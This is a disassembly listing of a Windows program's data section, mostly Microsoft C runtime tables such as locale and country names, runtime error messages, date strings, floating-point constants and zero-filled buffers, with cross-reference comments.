dd 18h
dd offset a_hypot ; "_hypot"
dd 16h
dd offset aFmod ; "fmod"
dd 17h
dd offset aFrexp ; "frexp"
dd 22h
dd offset a_y0 ; "_y0"
dd 23h
dd offset a_y1 ; "_y1"
dd 24h
dd offset a_yn ; "_yn"
dbl_454260 dq 1.797693134862316e308 ; DATA XREF: __handle_exc+E4�r
; __handle_exc:loc_42BE37�r ...
dd 0
dd 0FFF80000h
dbl_454270 dq 1.797693134862316e308 ; DATA XREF: __handle_exc:loc_42BE7A�r
; __handle_exc+167�r ...
dd 0
dd 100000h, 0
dd 80000000h
tbyte_454288 dt 2.3562723457267347066e313 ; DATA XREF: __set_statfp+13�r
; __set_statfp+2A�r
align 4
tbyte_454294 dt 1.9149954921904370718e-1233 ; DATA XREF: __set_statfp+41�r
align 10h
off_4542A0 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+3�w
; unknown_libname_7+6AD�r
off_4542A4 dd offset __cropzeros ; DATA XREF: __cfltcvt_init+D�w
; unknown_libname_7+6F1�r
off_4542A8 dd offset __fassign ; DATA XREF: __cfltcvt_init+17�w
; unknown_libname_11+1138�r
off_4542AC dd offset __forcdecpt ; DATA XREF: __cfltcvt_init+21�w
; unknown_libname_7+6CF�r
off_4542B0 dd offset __positive ; DATA XREF: __cfltcvt_init+2B�w
off_4542B4 dd offset __cfltcvt ; DATA XREF: __cfltcvt_init+35�w
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 10h
off_4542C0 dd offset ?terminate@@YAXXZ ; DATA XREF: sub_42DB70+2D�r
; sub_42DB70+3D�r
; terminate(void)
dword_4542C4 dd 43h ; DATA XREF: __setlocale_set_cat:loc_42E24C�o
; .data:004543E0�o ...
; char aC_2[]
aC_2 db 'C',0 ; DATA XREF: __expandlocale+8D�o
; __expandlocale+117�o ...
align 4
dd 20h dup(0)
; char aC_3[]
aC_3 db 'C',0 ; DATA XREF: __expandlocale+74�o
; __expandlocale+FC�o ...
align 10h
dd 20h dup(0)
off_4543D0 dd offset aLc_all ; DATA XREF: _setlocale+17F�r
; _setlocale+198�r ...
; "LC_ALL"
; char *dword_4543D4
dword_4543D4 dd 0 ; DATA XREF: _setlocale+77�r
; _setlocale+320�r ...
off_4543D8 dd offset sub_42E510 ; DATA XREF: __setlocale_set_cat+12B�r
dd offset aLc_collate ; "LC_COLLATE"
dd offset dword_4542C4
dd offset sub_435080
dd offset aLc_ctype ; "LC_CTYPE"
off_4543EC dd offset dword_4542C4 ; DATA XREF: __setlocale_get_all+F0�r
dd offset unknown_libname_28 ; Microsoft VisualC 2-8/net runtime
dd offset aLc_monetary ; "LC_MONETARY"
dd offset dword_4542C4
dd offset ___init_monetary
dd offset aLc_numeric ; "LC_NUMERIC"
dd offset dword_4542C4
dd offset ___init_numeric
dd offset aLc_time ; "LC_TIME"
dd offset dword_4542C4
dd offset ___init_time
dword_454418 dd 0C0000005h, 0Bh, 0 ; DATA XREF: __initptd+6�o
; __freeptd+CE�o ...
dd 0C000001Dh, 4, 0
dd 0C0000096h, 4, 0
dd 0C000008Dh, 8, 0
dd 0C000008Eh, 8, 0
dd 0C000008Fh, 8, 0
dd 0C0000090h, 8, 0
dd 0C0000091h, 8, 0
dd 0C0000092h, 8, 0
dd 0C0000093h, 8, 0
dword_454490 dd 3 ; DATA XREF: __XcptFilter+98�r
; __XcptFilter:loc_42F2BB�r ...
dword_454494 dd 7 ; DATA XREF: __XcptFilter+B1�r
; _raise+17D�r
dword_454498 dd 78h ; DATA XREF: .text:004308B8�r
; .text:004308D6�r
dword_45449C dd 0Ah ; DATA XREF: _xcptlookup+1D�r
; _xcptlookup:loc_42F402�r ...
dword_4544A0 dd 0FFFFFFFFh, 0A00h, 8 dup(0) ; DATA XREF: __filbuf:loc_4274B6�o
; __flsbuf:loc_428139�o
dword_4544C8 dd 2 ; DATA XREF: __NMSG_WRITE+2A�r
; __NMSG_WRITE+3D�r ...
; char *off_4544CC
off_4544CC dd offset aR6002FloatingP ; DATA XREF: __NMSG_WRITE+56�r
; __NMSG_WRITE+98�r ...
; "R6002\r\n- floating point not loaded\r\n"
dd 8
dd offset aR6008NotEnough ; "R6008\r\n- not enough space for arguments"...
dd 9
dd offset aR6009NotEnough ; "R6009\r\n- not enough space for environme"...
dd 0Ah
dd offset aAbnormalProgra ; "\r\nabnormal program termination\r\n"
dd 10h
dd offset aR6016NotEnough ; "R6016\r\n- not enough space for thread da"...
dd 11h
dd offset aR6017Unexpecte ; "R6017\r\n- unexpected multithread lock er"...
dd 12h
dd offset aR6018Unexpecte ; "R6018\r\n- unexpected heap error\r\n"
dd 13h
dd offset aR6019UnableToO ; "R6019\r\n- unable to open console device\r"...
dd 18h
dd offset aR6024NotEnough ; "R6024\r\n- not enough space for _onexit/a"...
dd 19h
dd offset aR6025PureVirtu ; "R6025\r\n- pure virtual function call\r\n"
dd 1Ah
dd offset aR6026NotEnough ; "R6026\r\n- not enough space for stdio ini"...
dd 1Bh
dd offset aR6027NotEnough ; "R6027\r\n- not enough space for lowio ini"...
dd 1Ch
dd offset aR6028UnableToI ; "R6028\r\n- unable to initialize heap\r\n"
dd 78h
dd offset aDomainError ; "DOMAIN error\r\n"
dd 79h
dd offset aSingError ; "SING error\r\n"
dd 7Ah
dd offset aTlossError ; "TLOSS error\r\n"
dd 0FCh
dd offset asc_43D46C ; "\r\n"
dd 0FFh
dd offset aRuntimeError ; "runtime error "
align 10h
dword_454560 dd 2694h ; DATA XREF: __handle_qnan1+3�r
; __handle_qnan2+F�r ...
align 8
dword_454568 dd 400h, 0FFFFFC01h, 35h, 0Bh, 40h, 3FFh ; DATA XREF: sub_432C80+3�o
dword_454580 dd 80h, 0FFFFFF81h, 18h, 8, 20h, 7Fh ; DATA XREF: sub_432CA0+3�o
dword_454598 dd 7080h ; DATA XREF: ___loctotime_t+92�r
; __tzset_lk+80�w ...
dword_45459C dd 1 ; DATA XREF: ___loctotime_t+C2�r
; __tzset_lk+BF�w ...
dword_4545A0 dd 0FFFFF1F0h ; DATA XREF: ___loctotime_t+DE�r
; __tzset_lk+D7�w ...
dword_4545A4 dd 545350h, 0Fh dup(0) ; DATA XREF: .data:off_454624�o
dword_4545E4 dd 544450h, 0Fh dup(0) ; DATA XREF: .data:off_454628�o
; char *off_454624
off_454624 dd offset dword_4545A4 ; DATA XREF: __tzset_lk+FA�r
; __tzset_lk+123�r ...
; char *off_454628
off_454628 dd offset dword_4545E4 ; DATA XREF: __tzset_lk+140�r
; __tzset_lk+16A�r ...
align 10h
dword_454630 dd 0FFFFFFFFh ; DATA XREF: __tzset_lk+30�w
; sub_4336D0+1A�r ...
dword_454634 dd 0 ; DATA XREF: sub_4336D0:loc_4338CB�r
; sub_4336D0+20F�r ...
dword_454638 dd 0 ; DATA XREF: sub_4336D0+2CF�r
; _cvtdate+13D�w
align 10h
dword_454640 dd 0FFFFFFFFh ; DATA XREF: __tzset_lk+21�w
; __tzset_lk+2B�r ...
dword_454644 dd 0 ; DATA XREF: sub_4336D0+201�r
; sub_4336D0+21D�r ...
dword_454648 dd 0 ; DATA XREF: sub_4336D0+2E5�r
; _cvtdate+1D�r ...
dword_45464C dd 0FFFFFFFFh ; DATA XREF: _cvtdate+B0�r
dd 1Eh, 3Bh, 5Ah, 78h, 97h, 0B5h, 0D4h, 0F3h, 111h, 130h
dd 14Eh
dword_45467C dd 16Dh ; DATA XREF: ___loctotime_t+2E�r
; _cvtdate+2C�r ...
dword_454680 dd 0FFFFFFFFh ; DATA XREF: _cvtdate+BF�r
dd 1Eh, 3Ah, 59h, 77h, 96h, 0B4h, 0D3h, 0F2h, 110h, 12Fh
dd 14Dh, 16Ch, 3 dup(0)
dword_4546C0 dd 40Ah ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+3E�r
; crtGetLocaleInfoA(x,x,x,x)+147�r
a040a db '040a',0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+9A�o
align 4
off_4546CC dd offset aSpanishTraditi ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+AB�r
; "Spanish - Traditional Sort"
dword_4546D0 dd 505345h ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+BC�o
off_4546D4 dd offset aSpain ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+CD�r
; "Spain"
dword_4546D8 dd 505345h ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+DE�o
dword_4546DC dd 303538h, 0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+EF�o
a1252 db '1252',0 ; DATA XREF: crtGetLocaleInfoA(x,x,x,x)+100�o
align 4
dd 40Bh, 62303430h, 0
dd offset aFinnish ; "Finnish"
dd offset word_4E4946
dd offset aFinland ; "Finland"
dd offset word_4E4946
dd 303538h, 0
a1252_0 db '1252',0
align 4
dd 40Ch, 63303430h, 0
dd offset aFrench ; "French"
dd 415246h
dd offset aFrance ; "France"
dd 415246h, 303538h, 0
a1252_1 db '1252',0
align 4
dd 40Fh, 66303430h, 0
dd offset aIcelandic ; "Icelandic"
dd offset byte_4C5349
dd offset aIceland ; "Iceland"
dd offset byte_4C5349
dd 303538h, 0
a1252_2 db '1252',0
align 10h
dd 41Dh, 64313430h, 0
dd offset aSwedish ; "Swedish"
dd offset byte_455653
dd offset aSweden ; "Sweden"
dd offset byte_455753
dd 303538h, 0
a1252_3 db '1252',0
align 4
dd 42Dh, 64323430h, 0
dd offset aBasque ; "Basque"
dd 515545h
dd offset aSpain ; "Spain"
dd 505345h, 303538h, 0
a1252_4 db '1252',0
align 4
db 0Ah
db 8,0
align 4
a080a db '080a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4D5345
dd offset aMexico ; "Mexico"
dd 58454Dh, 303538h, 0
a1252_5 db '1252',0
align 4
dd 80Ch, 63303830h, 0
dd offset aFrench ; "French"
dd 425246h
dd offset aBelgium ; "Belgium"
dd offset word_4C4542
dd 303538h, 0
a1252_6 db '1252',0
align 10h
dd 0C07h, 37306330h, 0
dd offset aGerman ; "German"
dd 414544h
dd offset aAustria ; "Austria"
dword_454838 dd 545541h, 303538h, 0 ; DATA XREF: .data:00454914�o
a1252_7 db '1252',0
align 4
dd 0C09h, 39306330h, 0
dd offset aEnglish ; "English"
dd 414E45h
dd offset aAustralia ; "Australia"
dd 535541h, 303538h, 0
a1252_8 db '1252',0
align 4
dd 0C0Ah, 61306330h, 0
dd offset aSpanishModernS ; "Spanish - Modern Sort"
dd offset byte_4E5345
dd offset aSpain ; "Spain"
dd 505345h, 303538h, 0
a1252_9 db '1252',0
align 4
dd 0C0Ch, 63306330h, 0
dd offset aFrench ; "French"
dd 435246h
dd offset aCanada ; "Canada"
dd offset byte_4E4143
dd 303538h, 0
a1252_10 db '1252',0
align 10h
dd 100Ah, 61303031h, 0
dd offset aSpanish ; "Spanish"
dd offset byte_475345
dd offset aGuatemala ; "Guatemala"
dd offset byte_4D5447
dd 303538h, 0
a1252_11 db '1252',0
align 4
dd 100Ch, 63303031h, 0
dd offset aFrench ; "French"
dd 535246h
dd offset aSwitzerland ; "Switzerland"
dd offset dword_454838+0Bh
dd 303538h, 0
a1252_12 db '1252',0
align 4
dd 140Ah, 61303431h, 0
dd offset aSpanish ; "Spanish"
dd 435345h
dd offset aCostaRica ; "Costa Rica"
dd offset byte_495243
dd 303538h, 0
a1252_13 db '1252',0
align 4
dd 140Ch, 63303431h, 0
dd offset aFrench ; "French"
dd offset word_4C5246
dd offset aLuxembourg ; "Luxembourg"
dd 58554Ch, 303538h, 0
a1252_14 db '1252',0
align 10h
dd 180Ah, 61303831h, 0
dd offset aSpanish ; "Spanish"
dd 415345h
dd offset aPanama ; "Panama"
dd offset dword_4E4150
dd 303538h, 0
a1252_15 db '1252',0
align 4
dd 1C09h, 39306331h, 0
dd offset aEnglish ; "English"
dd 534E45h
dd offset aSouthAfrica ; "South Africa"
dd offset word_46415A
dd 373334h, 0
a1252_16 db '1252',0
align 4
dd 1C0Ah, 61306331h, 0
dd offset aSpanish ; "Spanish"
dd offset off_445344+1
dd offset aDominicanRepub ; "Dominican Republic"
dd offset dword_4D4F44
dd 303538h, 0
a1252_17 db '1252',0
align 4
db 0Ah
db ' ',0
align 4
a200a db '200a',0
align 10h
dd offset aSpanish ; "Spanish"
dd 565345h
dd offset aVenezuela ; "Venezuela"
dd offset word_4E4556
dd 303538h, 0
a1252_18 db '1252',0
align 10h
db 0Ah
db '$',0
align 4
a240a db '240a',0
align 4
dd offset aSpanish ; "Spanish"
dd 4F5345h
dd offset aColombia ; "Colombia"
dd offset byte_4C4F43
dd 303538h, 0
a1252_19 db '1252',0
align 4
db 0Ah
db '(',0
align 10h
a280a db '280a',0
align 4
dd offset aSpanish ; "Spanish"
dd 525345h
dd offset aPeru ; "Peru"
dd 524550h, 303538h, 0
a1252_20 db '1252',0
align 4
db 0Ah
db ',',0
align 4
a2c0a db '2c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 535345h
dd offset aArgentina ; "Argentina"
dd offset byte_475241
dd 303538h, 0
a1252_21 db '1252',0
align 4
a0_0 db 0Ah
db '0',0
align 4
a300a db '300a',0
align 10h
dd offset aSpanish ; "Spanish"
dd offset byte_465345
dd offset aEcuador ; "Ecuador"
dd 554345h, 303538h, 0
a1252_22 db '1252',0
align 10h
a4 db 0Ah
db '4',0
align 4
a340a db '340a',0
align 4
dd offset aSpanish ; "Spanish"
dd offset byte_4C5345
dd offset aChile ; "Chile"
dd offset byte_4C4843
dd 303538h, 0
a1252_23 db '1252',0
align 4
a8 db 0Ah
db '8',0
align 10h
a380a db '380a',0
align 4
dd offset aSpanish ; "Spanish"
dd 595345h
dd offset aUruguay ; "Uruguay"
dd 595255h, 303538h, 0
a1252_24 db '1252',0
align 4
db 0Ah
db '<',0
align 4
a3c0a db '3c0a',0
align 4
dd offset aSpanish ; "Spanish"
dd 5A5345h
dd offset aParaguay ; "Paraguay"
dd 595250h, 303538h, 0
a1252_25 db '1252',0
align 4
word_454B64 dw 0C0Ch ; DATA XREF: _TestDefaultCountry+34�r
dw 0C1Ah
dd 4361007h, 42D080Ch, 100C0403h, 81D0810h
off_454B78 dd offset aAmerica ; DATA XREF: ___get_qualified_locale+9C�o
; "america"
dd 415355h
dd offset aBritain ; "britain"
dd 524247h
dd offset aChina ; "china"
dd offset byte_4E4843
dd offset aCzech ; "czech"
dd offset byte_455A43
dd offset aEngland ; "england"
dd 524247h
dd offset aGreatBritain ; "great britain"
dd 524247h
dd offset aHolland ; "holland"
dd offset off_444C4C+2
dd offset aHongKong ; "hong-kong"
dd offset dword_474B48
dd offset aNewZealand ; "new-zealand"
dd offset word_4C5A4E
dd offset aNz ; "nz"
dd offset word_4C5A4E
dd offset aPrChina_0 ; "pr china"
dd offset byte_4E4843
dd offset aPrChina ; "pr-china"
dd offset byte_4E4843
dd offset aPuertoRico ; "puerto-rico"
dd offset dword_495250
dd offset aSlovak ; "slovak"
dd offset byte_4B5653
dd offset aSouthAfrica_1 ; "south africa"
dd offset word_46415A
dd offset aSouthKorea_0 ; "south korea"
dd 524F4Bh
dd offset aSouthAfrica_0 ; "south-africa"
dd offset word_46415A
dd offset aSouthKorea ; "south-korea"
dd 524F4Bh
dd offset aTrinidadTobago ; "trinidad & tobago"
dd offset dword_4F5454
dd offset aUk ; "uk"
dd 524247h
dd offset aUnitedKingdom ; "united-kingdom"
dd 524247h
dd offset aUnitedStates ; "united-states"
dd 415355h
dd offset aUs ; "us"
dd 415355h
off_454C30 dd offset aAmerican ; DATA XREF: ___get_qualified_locale+67�o
; "american"
dd 554E45h
dd offset aAmericanEngl_0 ; "american english"
dd 554E45h
dd offset aAmericanEnglis ; "american-english"
dd 554E45h
dd offset aAustralian ; "australian"
dd 414E45h
dd offset aBelgian ; "belgian"
dd 424C4Eh
dd offset aCanadian ; "canadian"
dd 434E45h
dd offset aChh ; "chh"
dd offset word_48485A
dd offset aChi ; "chi"
dd offset word_49485A
dd offset aChinese ; "chinese"
dd 534843h
dd offset aChineseHongkon ; "chinese-hongkong"
dd offset word_48485A
dd offset aChineseSimplif ; "chinese-simplified"
dd 534843h
dd offset aChineseSingapo ; "chinese-singapore"
dd offset word_49485A
dd offset aChineseTraditi ; "chinese-traditional"
dd 544843h
dd offset aDutchBelgian ; "dutch-belgian"
dd 424C4Eh
dd offset aEnglishAmerica ; "english-american"
dd 554E45h
dd offset aEnglishAus ; "english-aus"
dd 414E45h
dd offset aEnglishBelize ; "english-belize"
dd offset byte_4C4E45
dd offset aEnglishCan ; "english-can"
dd 434E45h
dd offset aEnglishCaribbe ; "english-caribbean"
dd 424E45h
dd offset aEnglishIre ; "english-ire"
dd offset byte_494E45
dd offset aEnglishJamaica ; "english-jamaica"
dd offset byte_4A4E45
dd offset aEnglishNz ; "english-nz"
dd 5A4E45h
dd offset aEnglishSouthAf ; "english-south africa"
dd 534E45h
dd offset aEnglishTrinida ; "english-trinidad y tobago"
dd 544E45h
dd offset aEnglishUk ; "english-uk"
dd offset byte_474E45
dd offset aEnglishUs ; "english-us"
dd 554E45h
dd offset aEnglishUsa ; "english-usa"
dd 554E45h
dd offset aFrenchBelgian ; "french-belgian"
dd 425246h
dd offset aFrenchCanadian ; "french-canadian"
dd 435246h
dd offset aFrenchLuxembou ; "french-luxembourg"
dd offset word_4C5246
dd offset aFrenchSwiss ; "french-swiss"
dd 535246h
dd offset aGermanAustrian ; "german-austrian"
dd 414544h
dd offset aGermanLichtens ; "german-lichtenstein"
dd 434544h
dd offset aGermanLuxembou ; "german-luxembourg"
dd offset dword_4C4544
dd offset aGermanSwiss ; "german-swiss"
dd 534544h
dd offset aIrishEnglish ; "irish-english"
dd offset byte_494E45
dd offset aItalianSwiss ; "italian-swiss"
dd 535449h
dd offset aNorwegian ; "norwegian"
dd 524F4Eh
dd offset aNorwegianBokma ; "norwegian-bokmal"
dd 524F4Eh
dd offset aNorwegianNynor ; "norwegian-nynorsk"
dd offset word_4E4F4E
dd offset aPortugueseBraz ; "portuguese-brazilian"
dd 425450h
dd offset aSpanishArgenti ; "spanish-argentina"
dd 535345h
dd offset aSpanishBolivia ; "spanish-bolivia"
dd 425345h
dd offset aSpanishChile ; "spanish-chile"
dd offset byte_4C5345
dd offset aSpanishColombi ; "spanish-colombia"
dd 4F5345h
dd offset aSpanishCostaRi ; "spanish-costa rica"
dd 435345h
dd offset aSpanishDominic ; "spanish-dominican republic"
dd offset off_445344+1
dd offset aSpanishEcuador ; "spanish-ecuador"
dd offset byte_465345
dd offset aSpanishElSalva ; "spanish-el salvador"
dd offset byte_455345
dd offset aSpanishGuatema ; "spanish-guatemala"
dd offset byte_475345
dd offset aSpanishHondura ; "spanish-honduras"
dd offset byte_485345
dd offset aSpanishMexican ; "spanish-mexican"
dd offset byte_4D5345
dd offset aSpanishModern ; "spanish-modern"
dd offset byte_4E5345
dd offset aSpanishNicarag ; "spanish-nicaragua"
dd offset byte_495345
dd offset aSpanishPanama ; "spanish-panama"
dd 415345h
dd offset aSpanishParagua ; "spanish-paraguay"
dd 5A5345h
dd offset aSpanishPeru ; "spanish-peru"
dd 525345h
dd offset aSpanishPuertoR ; "spanish-puerto rico"
dd 555345h
dd offset aSpanishUruguay ; "spanish-uruguay"
dd 595345h
dd offset aSpanishVenezue ; "spanish-venezuela"
dd 565345h
dd offset aSwedishFinland ; "swedish-finland"
dd offset byte_465653
dd offset aSwiss ; "swiss"
dd 534544h
dd offset aUk ; "uk"
dd offset byte_474E45
dd offset aUs ; "us"
dd 554E45h
dd offset aUsa ; "usa"
dd 554E45h
; void *off_454E38
off_454E38 dd offset off_454E40 ; DATA XREF: ___init_time+70�w
; ___init_time:loc_433C71�w ...
align 10h
off_454E40 dd offset aSun ; DATA XREF: ___init_time:loc_433C71�o
; .data:off_454E38�o
; "Sun"
dd offset aMon ; "Mon"
dd offset aTue ; "Tue"
dd offset aWed ; "Wed"
dd offset aThu ; "Thu"
dd offset aFri ; "Fri"
dd offset aSat ; "Sat"
dd offset aSunday ; "Sunday"
dd offset aMonday ; "Monday"
dd offset aTuesday ; "Tuesday"
dd offset aWednesday ; "Wednesday"
dd offset aThursday ; "Thursday"
dd offset aFriday ; "Friday"
dd offset aSaturday ; "Saturday"
dd offset aJan ; "Jan"
dd offset aFeb ; "Feb"
dd offset aMar ; "Mar"
dd offset aApr ; "Apr"
dd offset aMay ; "May"
dd offset aJun ; "Jun"
dd offset aJul ; "Jul"
dd offset aAug ; "Aug"
dd offset aSep ; "Sep"
dd offset aOct ; "Oct"
dd offset aNov ; "Nov"
dd offset aDec ; "Dec"
dd offset aJanuary ; "January"
dd offset aFebruary ; "February"
dd offset aMarch ; "March"
dd offset aApril ; "April"
dd offset aMay ; "May"
dd offset aJune ; "June"
dd offset aJuly ; "July"
dd offset aAugust ; "August"
dd offset aSeptember ; "September"
dd offset aOctober ; "October"
dd offset aNovember ; "November"
dd offset aDecember ; "December"
dd offset aAm_0 ; "AM"
dd offset aPm_2 ; "PM"
dd offset aMDYy ; "M/d/yy"
dd offset aDdddMmmmDdYyyy ; "dddd, MMMM dd, yyyy"
dd offset aHMmSs ; "H:mm:ss"
align 10h
dword_454EF0 dd 2Eh, 0 ; DATA XREF: ___init_numeric+EE�o
; .data:off_454EF8�o
off_454EF8 dd offset dword_454EF0 ; DATA XREF: ___init_monetary+D4�w
; ___init_monetary+F6�o ...
off_454EFC dd offset dword_4F3894 ; DATA XREF: ___init_monetary+E2�w
off_454F00 dd offset dword_4F3894 ; DATA XREF: ___init_monetary+F1�w
dd offset dword_4F3894
dd offset dword_4F3894
dd offset dword_4F3894
dd offset dword_4F3894
dd offset dword_4F3894
dd offset dword_4F3894
dd offset dword_4F3894
dd 2 dup(7F7F7F7Fh)
off_454F28 dd offset off_454EF8 ; DATA XREF: ___init_numeric:loc_434639�r
; ___init_numeric+F8�r ...
align 10h
dword_454F30 dd 2 dup(0) ; DATA XREF: ___multtenpow12+6�o
dd 4002A000h, 2 dup(0)
dd 4005C800h, 2 dup(0)
dd 4008FA00h, 2 dup(0)
dd 400C9C40h, 2 dup(0)
dd 400FC350h, 2 dup(0)
dd 4012F424h, 0
dd 80000000h, 40169896h, 0
dd 20000000h, 4019BEBCh, 0
dd 0C9BF0400h, 40348E1Bh, 0A1000000h, 1BCECCEDh, 404ED3C2h
dd 0B59EF020h, 0ADA82B70h, 40699DC5h, 25FD5DD0h, 4F8E1AE5h
dd 4083EB19h, 95D79671h, 8D050E43h, 409EAF29h, 44A0BFF9h
dd 8F1281EDh, 40B98281h, 0A6D53CBFh, 1F49FFCFh, 40D3C278h
dd 8CE0C66Fh, 47C980E9h, 41A893BAh, 556B85BCh, 0F78D3927h
dd 427CE070h, 0DE8EDDBCh, 0EBFB9DF9h, 4351AA7Eh, 0E376E6A1h
dd 2F29F2CCh, 44268184h, 0AA171028h, 0E310AEF8h, 44FAC4C5h
dd 0F3D4A7EBh, 4AE1EBF7h, 45CF957Ah, 91C7CC65h, 0A0AEA60Eh
dd 46A3E319h, 0C17650Dh, 75868175h, 4D48C976h, 0A7E44258h
dd 353B3993h, 53EDB2B8h, 5DE5A74Dh, 3B5DC53Dh, 5A929E8Bh
dd 0F0A65DFFh, 54C020A1h, 61378CA5h, 5A8BFDD1h, 5D25D88Bh
dd 67DBF989h, 0F3F895AAh, 0C8A2BF27h, 6E80DD5Dh, 979BC94Ch
dd 52028A20h, 7525C460h, 0
dword_455090 dd 0CCCDCCCDh, 0CCCCCCCCh, 3FFBCCCCh, 0D70A3D71h, 0A3D70A3h
; DATA XREF: ___multtenpow12+2A�o
dd 3FF8A3D7h, 0DF3B645Ah, 6E978D4Fh, 3FF58312h, 652CD3C3h
dd 1758E219h, 3FF1D1B7h, 84230FD0h, 0AC471B47h, 3FEEA7C5h
dd 69B6A640h, 0BD05AF6Ch, 3FEB8637h, 42BC3D33h, 94D5E57Ah
dd 3FE7D6BFh, 0CEFDFDC2h, 77118461h, 3FE4ABCCh, 0E15B4C2Fh
dd 94BEC44Dh, 3FC9E695h, 3B53C492h, 14CD4475h, 3FAF9ABEh
dd 94BA67DEh, 1EAD4539h, 3F94CFB1h, 0E2C62324h, 313BBABCh
dd 3F7A8B61h, 0C1595561h, 7C53B17Eh, 3F5FBB12h, 8D2FEED7h
dd 8592BE06h, 3F44FB15h, 0E9A53F24h, 0EA27A539h, 3F2AA87Fh
dd 0E4A1AC7Dh, 467C64BCh, 3E55DDD0h, 0CC067B63h, 83775423h
dd 3D8191FFh, 193AFA91h, 4325637Ah, 3CACC031h, 38D18921h
dd 0B8974782h, 3BD7FD00h, 85888DCh, 0E3E8B11Bh, 3B03A686h
dd 424584C6h, 7599B607h, 3A2EDB37h, 0D21C7133h, 0EE32DB23h
dd 395A9049h, 0C0BE87A6h, 82A5DA57h, 32B5A2A6h, 11B268E2h
dd 449F52A7h, 2C10B759h, 2DE44925h, 534F3436h, 256BCEAEh
dd 0A404598Fh, 7DC2DEC0h, 1EC6E8FBh, 5A88E79Eh, 0BF3C9157h
dd 18228350h, 62654B4Eh, 0AF8F83FDh, 117D9406h, 9FDE2DE4h
dd 4C8D2CEh, 0AD8A6DDh, 0
off_4551F0 dd offset off_43E178 ; DATA XREF: .rdata:off_43E1B8�o
; .rdata:0043E2E4�o ...
align 8
a_?avexception@ db '.?AVexception@@',0
off_455208 dd offset off_43E178 ; DATA XREF: .rdata:off_43E1D0�o
; .rdata:0043E214�o ...
align 10h
a_?avlogic_erro db '.?AVlogic_error@std@@',0
align 4
off_455228 dd offset off_43E178 ; DATA XREF: .rdata:off_43E220�o
; .rdata:0043E264�o ...
align 10h
a_?avlength_err db '.?AVlength_error@std@@',0
align 4
off_455248 dd offset off_43E178 ; DATA XREF: .rdata:off_43E270�o
; .rdata:0043E2B4�o ...
align 10h
a_?avout_of_ran db '.?AVout_of_range@std@@',0
align 4
off_455268 dd offset off_43E178 ; DATA XREF: .rdata:off_43E2F0�o
; .rdata:0043E32C�o
align 10h
a_?avtype_info@ db '.?AVtype_info@@',0
dd offset ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z ; __CxxUnhandledExceptionFilter(_EXCEPTION_POINTERS *)
align 8
dword_455288 dd 2 dup(0) ; DATA XREF: sub_401317+C8�o
dword_455290 dd 2 dup(0) ; DATA XREF: sub_401317+62�o
; char dword_455298[]
dword_455298 dd 0 ; DATA XREF: WinMain(x,x,x,x)+38F�o
; sub_401CC7+AF0�o ...
dd 5 dup(0)
dword_4552B0 dd 0 ; DATA XREF: sub_401CC7+B4C�r
; sub_415B47+60�r
dd 24h dup(0)
db 0
byte_455345 db 3 dup(0) ; DATA XREF: .data:00454DB4�o
dd 0C2h dup(0)
db 3 dup(0)
byte_455653 db 0 ; DATA XREF: .data:00454780�o
dd 3Fh dup(0)
db 3 dup(0)
byte_455753 db 0 ; DATA XREF: .data:00454788�o
dd 0BBh dup(0)
db 3 dup(0)
byte_455A43 db 0 ; DATA XREF: .data:00454B94�o
dd 0F5h dup(0)
dword_455E18 dd 0 ; DATA XREF: sub_401CC7+5EE3�r
; sub_401CC7+5FC0�r ...
dd 7Fh dup(0)
dword_456018 dd 0 ; DATA XREF: sub_40B756+41�w
; sub_40B891+40�w ...
dword_45601C dd 0 ; DATA XREF: sub_40B756+47�w
; sub_40B891+46�w ...
dword_456020 dd 0 ; DATA XREF: sub_40B756+52�w
; sub_40B891+3A�r ...
dword_456024 dd 0 ; DATA XREF: sub_401317+C�r
; sub_4019E7+B9�w ...
dword_456028 dd 0 ; DATA XREF: sub_40B891+75�r
; sub_40BA72+2A�w ...
dword_45602C dd 0 ; DATA XREF: WinMain(x,x,x,x)+3DE�w
; WinMain(x,x,x,x)+456�w ...
byte_456030 db 0 ; DATA XREF: sub_4019E7+91�o
; sub_401CC7+5E28�r ...
align 4
dd 503h dup(0)
db 0
byte_457441 db 3 dup(0) ; DATA XREF: .data:off_44F70C�o
dd 3345h dup(0)
db 2 dup(0)
word_46415A dw 0 ; DATA XREF: .data:004549C4�o
; .data:00454BEC�o ...
dd 47Ah dup(0)
db 0
byte_465345 db 3 dup(0) ; DATA XREF: .data:00454AC4�o
; .data:00454DAC�o
dd 0C2h dup(0)
db 3 dup(0)
byte_465653 db 0 ; DATA XREF: .data:00454E14�o
dd 3D3Dh dup(0)
dword_474B48 dd 0BFh dup(0) ; DATA XREF: .data:00454BB4�o
db 0
byte_474E45 db 3 dup(0) ; DATA XREF: .data:00454CF4�o
; .data:00454E24�o
dd 0FEh dup(0)
db 0
byte_475241 db 3 dup(0) ; DATA XREF: .data:00454AA0�o
dd 40h dup(0)
db 0
byte_475345 db 3 dup(0) ; DATA XREF: .data:004548E0�o
; .data:00454DBC�o
dd 3D44h dup(0)
db 2 dup(0)
word_48485A dw 0 ; DATA XREF: .data:00454C64�o
; .data:00454C7C�o
dd 2BAh dup(0)
db 0
byte_485345 db 3 dup(0) ; DATA XREF: .data:00454DC4�o
dd 3D44h dup(0)
db 2 dup(0)
word_49485A dw 0 ; DATA XREF: .data:00454C6C�o
; .data:00454C8C�o
dd 17Ah dup(0)
db 0
byte_494E45 db 3 dup(0) ; DATA XREF: .data:00454CCC�o
; .data:00454D4C�o
dd 0FEh dup(0)
db 3 dup(0)
byte_495243 db 0 ; DATA XREF: .data:00454940�o
align 10h
dword_495250 dd 3Dh dup(0) ; DATA XREF: .data:00454BDC�o
db 0
byte_495345 db 3 dup(0) ; DATA XREF: .data:00454DDC�o
dd 3EBFh dup(0)
db 0
byte_4A4E45 db 3 dup(0) ; DATA XREF: .data:00454CD4�o
dd 40FFh dup(0)
db 0
